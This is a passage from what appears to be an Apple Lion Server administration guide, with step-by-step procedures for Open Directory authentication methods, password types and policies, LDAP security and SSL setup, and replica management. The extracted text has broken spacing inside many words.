Directory attempts to use LDAP bind authentication. Open Directory sends the LDAP directory s erver the name and pass word supplied by the authenticating user. If the LDAP s erver finds a matching user record and pas sword, authentication s ucceeds. If the LDAP directory s ervice and the client computers connection to it are configured to s end clear text pas swords over the network, LDAP bind authentication can be ins ecure. Open Directory tries to us e a secure authentication method with the LDAP directory. If the directory doesnt support s ecure LDAP bind and the clients LDAPv3 connection permits sending a clear-text password, Open Directory reverts to simple LDAP bind. To prevent clear-text authentication, make s ure your LDAP s ervers dont accept clear-text pass words. In this case, you can secure simple LDAP bind authentication by setting up acces s to the LDAP directory through the Secure Sockets Layer (SSL) protocol. SSL makes access secure by encrypting all communications with the LDAP directory. For more information, s ee Change the security policy for an LDAP connection and Change the connection settings for an LDAP or Open Directory server.
Authentication
Select authentication methods for Open Directory passwords

Using Server Admin, you can s elect authentication methods for user accounts whose password type is Open Directory. The Open Directory Pass word Server supports available authentication methods for compatibility with client software. If users never use client software that requires a specific authentication method, disable the method. For more information, see About Open Directory pas sword server and shadow pas sword authentication methods . If you disable an authentication method, its has h is removed from the password databas e the next time the us er authenticates. If you enable an authentication method that was disabled, you mus t reset every Open Directory password to add the enabled methods hash to the pass word database. The user can reset the pas sword, or a directory adminis trator can do it. To enable or dis able authentication methods for user accounts whose password type is Shadow Pass word, s ee Select authentication methods for shadow pas sword users .
1. Open Server Admin and connect to an Open Directory mas ter server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click Policies . 5. Click Authentication, s elect the authentication methods you want enabled, and deselect the authentication methods you want disabled. 6. Click Save. Replicas of the Open Directory master inherit the authentication method settings for Open Directory pass words in the LDAP directory You can also use pwpolicy to enable and disable authentication methods for a us er with an Open Directory password. For more information about pwpolicy, s ee its man page.
Authentication
Select authentication methods for shadow password users

Using Workgroup Manager, you can select authentication methods for a user account whose password type is Shadow Password. A shadow password supports available authentication methods for compatibility with client software. If you know the user will never use client software that requires an authentication method, disable the method. For more information, see About Open Directory pas sword server and shadow pas sword authentication methods . If you disable an authentication method, its has h is removed from the us ers shadow pass word file the next time the us er authenticates. If you enable an authentication method that was disabled, the enabled methods has h is added to the us ers shadow password file the next time the user authenticates for a service that can us e a clear-text password, such as a login window or AFP. Alternatively, the users pas sword can be reset to add the newly enabled methods has h. The user can res et the pass word, or a directory administrator can do it. To enable or dis able authentications for user accounts whose password type is Open Directory, s ee Select authentication methods for Open Directory passwords.
1. In Workgroup Manager, open the account you want to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the local directory domain where the users account resides . Click the lock and authenticate as a directory domain administrator, then select the user in the list. 2. Click Advanced, then click Security.
You can click Security only if the password type is Shadow Pass word. 3. Select the authentication methods you want enabled, deselect the authentication methods you want dis abled, then click OK. 4. Click Save.
You can also use pwpolicy to enable and disable authentication methods for a us er with an Shadow password. For more information about pwpolicy, s ee its man page.
Manage user authentication
Change a user's password

You can us e Workgroup Manager to change the password of a user account defined in any directory domain you have read/write access to. For example, you can change the password of a user account in the LDAP directory of an Open Directory master. Important: If you change the pas sword of a user account thats used to authenticate a computers LDAP directory connection, you must make the same change to the affected computers LDAP connection s ettings or configure the LDAP directory and all connections to it to us e trusted binding. For more information, s ee Change the password us ed for authenticating an LDAP connection, Set a binding policy for an Open Directory server, and Stop trusted binding with an LDAP directory.
1. Open Workgroup Manager (located /Applications/Server/), click the Accounts button, and then click the User button. 2. Open the directory domain that contains the user account whose pas sword you want to change, and authenticate as an administrator of the domain. To open a directory domain, click the s mall globe icon above the lis t of users and choose from the pop-up menu. If the us ers password type is Open Directory, you mus t authenticate as an administrator whos e pass word type is Open Directory. 3. Select the account whose pass word needs to be changed. 4. Enter a pas sword in the Basic pane, then click Save. 5. Tell the user the new password so he or s he can log in. After the user logs in to a Mac with the new password, the user can change the password by clicking Accounts in System Preferences. If you change the password of an account whose password type is Open Directory and the account resides in the LDAP directory of an Open Directory replica or master, the change becomes synchronized with the master and its replicas. The Mac s erver synchronizes changes to Open Directory passwords among a master and its replicas.
Assign a temporary password to multiple users

You can us e Workgroup Manager to simultaneously select multiple us er accounts and change them to have the s ame password type and the same temporary password.
1. Open Workgroup Manager (located /Applications/Server/), click the Accounts button, and then click the User button. 2. Open the directory domain that contains the user account whose pas sword types and passwords you want to reset and authenticate as an administrator of the domain. To open a directory domain, click the s mall globe icon above the lis t of users and choose from the pop-up menu. To s et the password type to Open Directory, you mus t authenticate as an administrator whos e pass word type is Open Directory. 3. Commandclick or Shiftclick us er accounts to select accounts whose pass word type must be changed.
4. Enter a pas sword in the Basic pane, then set the User Pass word Type option in the Advanced pane. 5. Click Save. 6. Tell the users the temporary password so they can log in. After logging in with the temporary pas sword, users can change the password by clicking Accounts in System Preferences. If you change the password of accounts whose password type is Open Directory and the accounts reside in the LDAP directory of an Open Directory replica or master, the change becomes synchronized with the master and its replicas. A Mac server synchronizes changes to Open Directory passwords among a master and its replicas.
Composing a Password
The password associated with a users account must be entered by the user when he or s he authenticates for login or other services. The password is cas e sensitive (except for SMB-LAN Manager pass words) and is masked on the screen as it is entered. Regardless of the pass word type you choose for a user, here are guidelines for compos ing a pas sword for Lion Server user accounts : A pas sword should contain letters , numbers, and symbols in combinations that wont be easily gues sed by unauthorized users. Pas swords should not consist of words . Good pas swords include digits and symbols (s uch as # or $), or they consist of the firs t letter of all words in a phras e. Us e both uppercas e and lowercase letters. Avoid s paces and Option-key combinations . Avoid characters that cant be entered on computers the user will use or that might require knowing a s pecial keystroke combination to enter correctly on different keyboards and platforms . Some network protocols do not support pass words that contain leading spaces, embedded s paces, or trailing spaces. A zero-length password is not recommended. Open Directory and some s ystems (such as LDAP bind) do not support a zerolength password. For maximum compatibility with computers and services your users might access, use only ASCII characters for passwords. Password Types You can set password types for us ers in the Advanced pane of Workgroup Manager. You can choos e any of the following pas sword types: Open Directory: Enables multiple legacy authentication methods and also enables single sign-on Kerberos authentication if the users account is in the LDAP directory of an Open Directory mas ter or replica. Open Directory pass words are stored separately from the directory domain in the Open Directory Password Server databas e and the Kerberos KDC. Shadow pas sword: Enables multiple legacy authentication methods for user accounts in the local directory domain. Shadow pas swords are stored separately from the directory domain in files readable only by the root user account. Crypt pass word: Provides basic authentication for a user account in a shared directory domain. A crypt pas sword is stored in the user account record in the directory domain. A crypt password is required to log in to Mac OS X v10.1 or earlier. For more information about password types, see About pas sword types.
Change the password type to Open Directory

Using Workgroup Manager, you can specify that a us er account have an Open Directory password s tored in secure databases apart from the directory domain. User accounts in the following directory domains can have Open Directory pass words: LDAP directory domain on Mac OS X Server v10.3v10.6 and Lion Server Local directory domain of Mac OS X Server v10.3 or a server upgraded from v10.3 Directory domain on Mac OS X Server v10.2 that is configured to us e a Pass word Server The Open Directory pas sword type s upports single sign-on using Kerberos authentication. It also s upports the Open Directory
Pas sword Server, which offers Simple Authentication and Security Layer (SASL) authentication protocols, including APOP, CRAMMD5, DHX, Digest-MD5, MS-CHAPv2, NTLMv2, NTLM (also referred to as Windows NT or SMB-NT), and WebDAV-Diges t. Note: To set a user accounts password type to Open Directory, you mus t have administrator rights for Open Directory authentication in the directory domain that contains the us er account. This means you must authenticate as a directory domain administrator whose password type is Open Directory. For more information, see Assign adminis trator rights for Open Directory authentication.
1. Make sure the users account resides in a directory domain that s upports Open Directory authentication. The directory domains that support Open Directory authentication are listed earlier in this topic. 2. In Workgroup Manager (located /Applications/Server/), open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the directory domain where the users account resides. Click the lock and authenticate as a directory domain administrator whos e pass word type is Open Directory, then select the us er in the list 3. Click Advanced. 4. From the User Pass word Type pop-up menu, choose Open Directory. 5. When prompted, enter and verify a new password, then click Ok. The pass word must contain no more than 512 bytes (512 characters or fewer, depending on the language), although the network authentication protocol can impose different limits (for example, 128 characters for NTLMv2 and NTLM). For guidelines on choos ing pass words, see Composing a Password. 6. In the Advanced pane, click Options to set up the users password policy, and click OK after you finis h specifying options. If you select Disable login: on specific date, use the up and down arrows to s et the date. If you select an option that requires resetting (changing) the pas sword, remember that not all protocols support changing passwords . For example, users cant change their pas swords when authenticating for IMAP mail service. The pass word ID is a unique 128-bit number assigned when the pas sword is created in the Open Directory Pas sword Server database. It can be helpful for troubles hooting, becaus e it appears in the Password Server log when a problem occurs. For more information, see View Open Directory status and logs. 7. Click Save.
Change the password type to shadow password

Using Workgroup Manager, you can specify that a us er have a shadow password s tored in a secure file apart from the directory domain. Only us ers whose accounts reside in the local directory domain can have a shadow password. Note: You can only as sign local us er accounts to use shadow passwords .
1. In Workgroup Manager (located /Applications/Server/), open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the local directory domain where the users account resides . Click the lock and authenticate as a directory domain administrator, then select the user in the list. 2. Click Advanced. 3. From the User Pass word Type pop-up menu, choose Shadow Password. 4. When prompted, enter and verify a pas sword, then click Ok. A long password is truncated for some authentication methods. Up to 128 characters of the password are us ed for NTLMv2 and NTLM, and the first 14 characters are used for LAN Manager. For guidelines on choosing pass words, s ee Composing a Password. 5. In the Advanced pane, click Options to set up the users password policy, then click OK after you finish s pecifying options.
If you select Disable login: on specific date, use the up and down arrows to s et the date. If you use a policy that requires user pas sword changing, remember that not all protocols support changing passwords. For example, users cant change their pas swords when authenticating for IMAP mail service. 6. In the Advanced pane, click Security to enable or disable authentication methods for the user, then click OK after you finish. For more information, see Set password policies for users. 7. Click Save.
Use pwpolicy to change password policies

You can us e pwpolicy to change pas sword policies globally from the command-line.
To change the password policy: $ pwpolicy -a authenticator -setglobalpolicy "option=value..." For example, to require that an authenticators pas sword be a minimum of 12 characters and have no more than 3 failed login attempts , enter the following in a Terminal window, where authenticator is the authenticators name. $ pwpolicy -a authenticator -setglobalpolicy "minChars=12 maxFailedLoginAttempts=3" For more information about pwpolicy, see its man page.
Set password policies for users

Using Workgroup Manager, you can set pass word policies for us er accounts whose pas sword type is Open Directory or Shadow Pas sword. The password policy for a user overrides the global pass word policy defined in the Authentication Settings pane of Open Directory service in Server Admin. The password policy for a mobile us er account applies when the account is used while the mobile computer is disconnected from the network. The password policy from the corresponding network user account applies while the mobile computer is connected to the network. Administrator accounts are exempt from password policies. To set a password policy for a user account that has an Open Directory password, you must have administrator rights for Open Directory authentication in the directory domain that contains the user account. This means you must authenticate as a directory domain adminis trator whose password type is Open Directory. For more information, s ee As sign administrator rights for Open Directory authentication. Kerberos and Open Directory Password Server maintain password policies s eparately. A Mac s erver synchronizes Kerberos pas sword policy rules with Open Directory Password Server password policy rules. Do not use the Options button in the Advanced pane to s et up pass word policies for directory domain administrators. Password policies are not enforced for administrator accounts. Directory domain administrators mus t be able to change the pas sword policies of user accounts.
1. In Workgroup Manager, open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the directory domain where the users account resides. Click the lock and authenticate as a directory domain administrator whos e pass word type is Open Directory, then select the us er in the list. 2. Click Advanced, then click Options. You can click Options only if the password type is Open Directory or Shadow Pass word.
3. Change password policy options , then click OK. If you select an option that requires resetting (changing) the pas sword, remember that some s ervice protocols dont permit us ers to change pass words. For example, us ers cant change their passwords when authenticating for IMAP mail service. 4. Click Save.
Use pwpolicy to set password policies for a single user account

You can us e pwpolicy to set an individual user account password policy.
To change the password policy of a user account: $ pwpolicy -a authenticator -setpolicy -u user "option=value..." For example, to require that an authenticators pas sword be a minimum of 12 characters and have no more than 3 failed login attempts , enter the following in a Terminal window, where authenticator is the authenticators name and user is the users name. $ pwpolicy -a authenticator -setpolicy -u user "minChars=12 maxFailedLoginAttempts=3" For information about pwpolicy, see its man page.
Assign administrator rights for Open Directory authentication

Using Workgroup Manager and an adminis trator account with rights to work with Open Directory password s ettings, you can ass ign these rights to other us er accounts in the same directory domain. To as sign these rights, your us er account must have an Open Directory password and privileges to administer us er accounts. This requirement protects the security of pas swords s tored in the Kerberos KDC and the Open Directory Password Server database.
1. In Workgroup Manager (located /Applications/Server/), open the account, click Advanced, and make sure Password Type is set to Open Directory password. For more information, see Changing the Password Type to Open Directory. 2. Click Privileges and choose Full in the Administration capabilities pop-up menu. To restrict the adminis tration capabilities, choose Limited. 3. Click Save.
Set passwords of exported or imported users

When you export user accounts whose pas sword type is Open Directory or shadow password, passwords are not exported. This protects the security of the Open Directory Password Server database and s hadow pass word files. Before importing, you can use a spreadsheet application to open the file of exported us ers and set their passwords, which they can change the next time they log in. For instructions on working with files of exported users, see Workgroup Manager Help. After importing user accounts, you have the following options for setting passwords : You can set all imported accounts to us e a temporary pas sword, which each user can change the next time he or she logs in. For more information, s ee Ass ign a temporary pas sword to multiple users. You can set the pas sword of each imported us er account in the Basic pane of Workgroup Manager. For more information, see Change a user's password.
Maintain Open Directory serv ices
Control access to a server's login window

You can us e Server Admin to control which users can log in to a Mac server using the login window. Us ers with server administrator privileges can always log in to the server.
1. Open Server Admin and connect to the s erver. 2. Click Setting, then click Acces s. 3. Click Services. 4. Select For selected services below and select Login Window in the list on the left. 5. Select Allow only us ers and groups below and edit the list of users and groups that you want to log in using the s ervers login window: Add users or groups that can use the login window by clicking the Add button (+) and dragging users or groups from the User & Groups window to the list. Remove us ers or groups from the list by s electing them and clicking the Remove button (). 6. Click Save. If Allow all users and groups is s elected when you select For selected s ervices below in step 4, all s ervices except login window permit access to all us ers and groups. If you want to restrict who can access a listed s ervice in addition to the login window, select the service in the list, select Allow only users and groups below, and add us ers and groups to the list. If you want all us ers to log in using the s ervers login window, s elect Login Window, then s elect Allow all users and groups.
Control access to SSH service

You can us e Server Admin to control which users can open a command-line connection to a Mac server us ing the ssh command in Terminal. Users with server administrator privileges can always open a connection us ing ssh. The s sh command uses the Secure Shell (SSH) service. For information about using the ss h command, s ee its man page.
1. Open Server Admin and connect to the s erver. 2. Click Setting, then click Acces s. 3. Click Services. 4. Select For selected services below and select SSH in the list on the left. 5. Select Allow only us ers and groups below and edit the list of users and groups that need SSH access to the server: Add users or groups that can open SSH connections by clicking the Add button (+) and dragging users or groups from the User & Groups window to the list. Remove us ers or groups from the list by s electing one or more and clicking the Remove button (). 6. Click Save. If Allow all users and groups is s elected when you select For selected s ervices below in step 4, all s ervices except SSH will permit acces s to all users and groups . If you want to restrict who can access a listed s ervice besides SSH, select the s ervice in the list, s elect Allow only users and groups below, and add us er and groups to the list. If you want all us ers to be able to open an SSH connection to the server, select SSH, then select Allow all us ers and groups.
Configure Open Directory service access control

You can configure Open Directory service access control by configuring service access control lists (SACLs) using Server Admin. SACLs enable you to specify which administrators have access to Open Directory. Only us ers and groups listed in an SACL have access to the corresponding service. For example, to give administrator access to users or groups for the Open Directory service on your s erver, add them to the Open Directory SACL.
1. Open Server Admin and connect to the s erver. 2. Click Setting, then click Acces s. 3. Click Administrator. 4. Select the level of restriction you want for the services : To restrict acces s to all services, s elect For all services. To s et access permissions for individual services, select For s elected s ervices below and then select Open Directory from the Service list. 5. Click the Add button (+) to open the Us ers & Groups window. 6. Drag us ers and groups from the Users & Groups window to the list. 7. Set user permissions: To grant administrator access, choose Adminis trator from the Permiss ion pop-up menu next to the user name. To grant monitoring access , choos e Monitor from the Permission pop-up menu next to the user name. 8. Click Save.
Check the status of an Open Directory server

Using Server Admin, you can confirm that the Open Directory master is functioning properly.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Overview. 5. Make sure the status of all items listed in the Open Directory overview pane is Running. If any item is stopped, click Refresh (or choos e View > Refresh). If Kerberos remains stopped, see If Kerberos is s topped on an Open Directory master or replica.
Monitor replias and relays of an Open Directory master

Using Server Admin, you can check the status of replica creation and ongoing replication.
3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General, to see a list of replicas and the status of each one. The status for a new replica indicates whether it was created successfully. Thereafter, the status indicates whether the most recent replication attempt was successful.
View Open Directory status and logs

You can us e Server Admin to view status information and logs for Open Directory services. The following logs are available: Directory services server log Directory services error log kadmin log kdc log LDAP log Pass word service s erver log Pass word service error log Pass word service replication log slapconfig log
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Overview to s ee status information. 5. Click Logs and use the View pop-up menu to choose the log you want to see. The path to the log file appears above the log. 6. Optionally, enter text in the filter field and press Return to s how only lines containing the text you entered.
Monitor Open Directory authentication

You can us e pass word service logs, vis ible using Server Admin, to monitor failed login attempts for suspicious activity. Open Directory us es logs to record failed authentication attempts , including IP addresses that generate them. Periodically review the logs to determine whether there are a large number of failed trials for the same pass word ID, indicating that somebody might be generating login guesses .
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Logs and choose the kdc log or a pas sword service log from the View pop-up menu.
Import records
Workgroup Manager can import all types of records into the LDAP directory of an Open Directory master. This includes us ers, groups, computer groups , computers, and all other standard Mac OS X record types. Important: If you import user or group records from a file exported by Mac OS X Server v10.3 or earlier, each imported record is ass igned a globally unique ID (GUID). To make sure that GUIDs and their relationships to specific users and groups remain the same (if you need to reimport the same users and groups ), create an export file using Workgroup Manager in Lion Server. Us e the Lion Server export file ins tead of the export file created using the earlier s erver version. For a list of record types and attributes that can be imported, see the following file: /System/Library/Frameworks/OpenDirectory.framework/Frameworks/CFOpenDirectory.framework/Headers /CFOpenDirectoryConstants.h For more information about exporting users and groups using Workgroup Manager and on importing records of any type, see Workgroup Manager Help.
Set a binding policy for an Open Directory server

Using Server Admin, you can configure an Open Directory master to permit or require trusted binding between the LDAP directory and the computers that access it. Replicas of an Open Directory master inherit the masters binding policy. Trusted LDAP binding is mutually authenticated. The computer proves its identity by us ing an LDAP directory administrators name and password to authenticate to the LDAP directory. The LDAP directory proves its authenticity by means of an authenticated computer record created in the directory when you set up trusted binding. Note: To use trusted LDAP binding, clients need Mac OS X v10.6 or Lion or Mac OS X v10.6 Server or Lion Server. Clients using v10.5 can us e anonymous binding, but cant set up trusted binding. Important: If your Lion Server is an Open Directory master, it has a diradmin user. When binding two directory servers , they should not have the same directory adminis trator user name (diradmin). If two Lion Servers are configured as Open Directory masters and are bound to each other, they become an invalid configuration and can caus e random failures. Make one of the Open Directory master s ervers a standalone s erver, then recreate it using Server Admin with a unique username for the directory administrator instead of the default diradmin.
1. Open Server Admin and connect to the Open Directory master server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click Policies . 5. Click Binding, then s et the directory binding options you want: To permit trusted binding, s elect Enable authenticated directory binding. 6. Click Save. Important: If you choose Encrypt all packets (requires SSL or Kerberos) and Enable authenticated directory binding, make sure your us ers are using one or the other for binding and not both.
Set a security policy for an Open Directory server

Using Server Admin, you can configure a security policy for acces s to the LDAP directory of an Open Directory mas ter. Replicas of the Open Directory master inherit the masters security policy. Note: If you change the security policy for the LDAP directory of an Open Directory master, you must disconnect and reconnect
(unbind and rebind) every computer connected (bound) to this LDAP directory.
1. Open Server Admin and connect to the Open Directory master server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click Policies . 5. Click Binding, then s et the s ecurity options you want: Disab le clear text passwords determines whether clients can send pas swords as clear text if the passwords cant be validated using any authentication method that sends an encrypted pass word. For more information, see Select authentication methods for shadow password us ers and Select authentication methods for Open Directory passwords. Encrypt all packets (requires SSL or Kerb eros) requires the LDAP s erver to encrypt directory data us ing SSL or Kerberos before sending it to client computers . Digitally sign all packets (requires Kerb eros) certifies that directory data from the LDAP server wont be intercepted and modified by another computer while en route to client computers. Block man-in-the-middle attacks (requires Kerb eros) protects agains t a rogue s erver posing as the LDAP server. This is best us ed with the Digitally s ign all packets option. Disab le client-side caching prevents client computers from caching LDAP data locally. Allow users to edit their own contact information permits users to change contact information on the LDAP s erver. 6. Click Save. Important: If you choose Encrypt all packets (requires SSL or Kerberos) and Enable authenticated directory binding, make sure your us ers are using one or the other for binding and not both. Bas ed on the settings here, the security options can also be configured on each client of an Open Directory mas ter or replica. If an option is selected here, it cant be des elected for a client. For more information about configuring these options on a client, see Change the security policy for an LDAP connection.
Limit search results for LDAP service

Using Server Admin, you can prevent one type of denial-of-s ervice attack on a Mac s erver by limiting the number of s earch results returned by the servers s hared LDAP directory domain. Limiting the number of search results prevents a malicious user from tying up the server by sending it multiple all-inclusive LDAP search requests.
1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click LDAP. 5. Enter the maximum number of returned search res ults in the Return a maximum of __ search results field. 6. Click Save.
Set the search timeout interval for LDAP service

Using Server Admin, you can prevent one type of denial-of-s ervice attack on a Mac s erver by limiting the amount of time the server spends on one search of its shared LDAP directory domain.
Setting a search timeout prevents a malicious us er from tying up the server by s ending it an exceptionally complex LDAP search request.
1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click LDAP. 5. Enter a search timeout interval in the Search times out in __ field. Set the time interval using the pop-up menu. 6. Click Save.
Set up SSL for LDAP service

Using Server Admin, you can enable Secure Sockets Layer (SSL) for encrypted communications between an Open Directory servers LDAP directory domain and computers that access it. SSL us es a digital certificate to provide a certified identity for the s erver. You can use a self-s igned certificate or a certificate obtained from a certificate authority. For information about defining, obtaining, and installing certificates on your server, see Server Admin Help. SSL communications for LDAP us e port 636. If SSL is disabled for LDAP s ervice, communications are sent as clear text on port 389.
1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click LDAP. 5. Select the Enable SSL checkbox. 6. Use the Certificate pop-up menu to choos e an SSL certificate that you want LDAP service to us e. The menu lis ts all SSL certificates installed on the server. To us e a certificate not lis ted, choos e Manage Certificates from the pop-up menu. For more information about certificates, see Server Admin Help. 7. Click Save. For more information about exporting users and groups using Workgroup Manager and on importing records of any type, see Workgroup Manger Help.
Create a custom SSL configuration for LDAP

SSL us es a digital certificate to provide a certified identity for the s erver. You can use custom digital certificates to configure SSL for your network environment. The following steps describe the command-line method for creating cus tom certificates and provide instructions for implementing them in Server Admin. To create an Open Directory s ervice certificate:
1. Generate a private key for the server in the /us r/share/certs / folder:
If the /usr/share/certs folder does not exist, create it. $ sudo openssl genrsa -out ldapserver.key 2048 2. Generate a certificate signing request (CSR) for the certificate authority (CA) to sign: $ sudo openssl req -new -key ldapserver.key -out ldapserver.csr 3. Fill out the following fields as completely as possible, making certain that the Common Name field matches the domain name of the LDAP server exactly, and leaving the challenge password and optional company name blank: Country Name: State or Province Name: Locality Name (city): Organization Name: Organizational Unit Name: Common Name: Email Address: 4. Sign the ldapserver.cs r request with the openssl command. $ sudo openssl ca -in ldapserver.csr -out ldapserver.crt 5. When prompted, enter the CA passphrase to continue and complete the process. The certificate files needed to enable SSL on the LDAP s erver are now in the /us r/share/certs / folder. 6. Click the triangle at the left of the server. The list of s ervices appears . 7. From the expanded Servers list, select Open Directory. 8. Click Settings, then click LDAP. 9. Select the Enable SSL checkbox. 10. Use the Certificate pop-up menu to choos e an SSL certificate that you want LDAP service to us e. The menu lis ts all SSL certificates that have been ins talled on the s erver. To use a certificate not listed, choose Manage Certificates from the pop-up menu. For more information about certificates , see Server Admin Help. 11. Click Save.
Make an Open Directory replica into a relay

There is not much difference between a relay and replica. Both have a read-only copy of the Open Directory masters LDAP directory domain and also a read/write copy of the Open Directory Password Server and the Kerberos Key Distribution Center (KDC). A relay is a direct member replica of an Open Directory mas ter and it has replicas that it replicates to. You can make an Open Directory replica into a relay by ensuring the following: The replica is a direct replica of the Open Directory master (first-tier). The replica has replicas (supports up to 32 replicas). For more information about relays, s ee Integrate with existing directory domains.
Configure locales
When a client connects to an Open Directory server, it may connect to an Open Directory master or to its replica. These
connections can become unbalanced, meaning you have more connections to your OD mas ter server than its replica. If you have replicas on your network, you can configure locales to specify which Open Directory s ervers clients should use and you can load balance your client connection between your Open Directory mas ter and its replicas. Locales are groups of s ervers that s ervice a specified subnet. These s ervers are given a locale name similar to an Active Directory forest name. After configuring an Open Directory mas ter and its replicas, two locales are configured by default. The firs t locale includes all of the Open Directory master's replicas, even those outside the s ubnet. This is created as a failsafe for the client if no locales are available for connection on the client's subnet. The s econd locale is bas ed on the subnet of the Open Directory master. This can include some of its replicas if they are on the same subnet. Servers and clients on the same s ubnet us e that Open Directory master and its replicas for directory service.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click Locales . 5. From the Locale list, click the Add button (+). 6. Enter a name in the Name field for the locale. This named is similar to an Active Directory forest name and is used by clients to connect to the locale. 7. (Optional) In the Comment field, enter a comment about the locale. 8. Click the Add button (+) below the Server list. 9. From the list of Open Directory servers , choos e the Open Directory servers you want in your locale by selecting the checkbox next to the server and then click OK. 10. Click the Add button (+) below the Subnets list. 11. Enter the subnet or subnets that will use the locale servers and click OK. You can enter multiple s ubnets . 12. Click Save.
Promote an Open Directory replica

If an Open Directory master fails and you cannot recover it from a backup, you can promote a replica to be a mas ter. The new master (promoted replica) uses the directory and authentication databases of the replica. After doing this , you must convert all other replicas of the old mas ter to standalone directory services and then make them replicas of the new master. Use this procedure only to replace an Open Directory mas ter with its replica. To keep the Open Directory master in operation and make its replica another master, do not use this procedure. Ins tead, decommis sion the replica and then make it a mas ter as des cribed in Decommiss ion an Open Directory replica and Set up an Open Directory master.
1. Open Server Admin and connect to the replica s erver you want to promote to a master. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. 5. Click Change.
This opens the Open Directory Ass is tant. 6. Select Promote replication to an Open Directory Master, then click Continue. 7. Enter the following Master Domain Administrator information, then click Continue. Short Name, Pass word: You must create a user account for the primary administrator of the LDAP directory. This account is not a copy of the administrator account in the servers local directory domain. Make the short names of the LDAP directory administrator different from names of us er accounts in the local directory domain. Note: If you plan to connect your Open Directory master to other directory domains , pick a unique name and user ID for each domain. Dont use the s uggested diradmin user ID. Use a name that helps you identify the directory domain that the directory administrator controls . 8. Enter the following Master Domain information, then click Continue. Kerberos Realm: This field is pres et to be the s ame as the servers DNS name, converted to capital letters. This is the convention for naming a Kerberos realm. You can enter a different name if necessary. Search Base: This field is preset to a search base suffix for the new LDAP directory, derived from the domain portion of the servers DNS name. You can enter a different search base suffix or leave it blank. If you leave this field blank, the LDAP directorys default search bas e suffix is us ed. 9. Confirm s ettings , then click Continue. This s aves your settings and restarts the service. 10. Click Done. 11. In Server Admin, connect to another replica of the old master. 12. Click the triangle at the left of the server. The list of s ervices appears . 13. From the expanded Servers list, select Open Directory. 14. Click Settings, then click General. 15. Click Change. The Open Directory As sistant opens. 16. Choose Set up a Standalone Directory, then click Continue. 17. Confirm the Open Directory configuration setting, then click Continue. 18. If you are sure that users and s ervices no longer need access to the directory data stored in the shared directory domain that the server has been hosting or was connected to, click Close. This s aves your settings and restarts the service. 19. Click Change. The Open Directory As sistant opens. 20. Choose Set up an Open Directory Replica, then click Continue. 21. Enter the following information: IP addres s or DNS name of Open Directory master: Enter the IP address or DNS name of the server that is the Open Directory master. Root password on Open Directory master: Enter the pas sword of the Open Directory master sys tems root user (user name s ystem administrator). Domain adminis trators s hort name: Enter the name of an LDAP directory domain adminis trator account. Domain adminis trators pass word: Enter the pas sword of the administrator account whose name you entered. 22. Click Continue. 23. Confirm the Open Directory configuration settings , then click Continue. 24. Click Done. This s aves your settings and restarts the service.
25. For each replica of the old mas ter, repeat steps 1123. 26. Make sure the date, time, and time zone are correct on the replicas and the mas ter. The replicas and the mas ter should use the s ame network time s ervice so their clocks remain in sync. If other computers were connected to the old Open Directory mas ters LDAP directory, reconfigure their connections to us e the new masters LDAP directory. Each Mac and Mac server with a cus tom search policy that included the old masters LDAP directory mus t be reconfigured to connect to the new mas ters LDAP directory. Use the Services and Authentication panes of Directory Utility (located in Users & Groups preferences ). For more information, s ee Reconfigure LDAP directory access.
Decommission an Open Directory replica

You can take an Open Directory replica server out of service by making it a standalone server or by connecting it to another system for directory and authentication s ervices .
1. Verify that the network connection is working between the Open Directory master and the replica you want to decommission. Port 389 or 636 mus t be open between master and replica while decommissioning the replica. LDAP uses port 389 if SSL is disabled or port 636 if SSL is enabled on the master. Important: If you decommis sion a replica while there is no network connectivity between it and the master, the decommissioned replica remains in the masters lis t of replicas. The mas ter tries to replicate to the decommiss ioned replica as s pecified in the General settings pane for Open Directory s ervice on the master server. 2. In Server Admin, connect to the replica you want to decommission. 3. Click the triangle at the left of the server. The list of s ervices appears . 4. From the expanded Servers list, select Open Directory. 5. Click Settings, then click General. 6. Click Change. The Open Directory As sistant opens. 7. Choose Decommission replica and set up a standalone directory or Decommis sion replica and connect to another directory and enter the following information. Root password on Open Directory master: Enter the pas sword of the Open Directory master sys tems root user (user name s ystem administrator). Domain adminis trators s hort name: Enter the name of an LDAP directory domain adminis trator account. Domain adminis trators pass word: Enter the pas sword of the administrator account whose name you entered. 8. Click Continue. 9. Confirm the Open Directory configuration setting, then click Continue. 10. If you are sure that users and s ervices no longer need access to the directory data stored in the shared directory domain that the server has been hosting or was connected to, click Done. This s aves your setting and res tarts the service. As suming there is a network connection between the Open Directory master and the replica, the master is updated to no longer connect to the replica. 11. If you chose Decommiss ion replica and connect to another directory from the Open Directory Assistant, click the Open Directory Utility button to configure acces s to 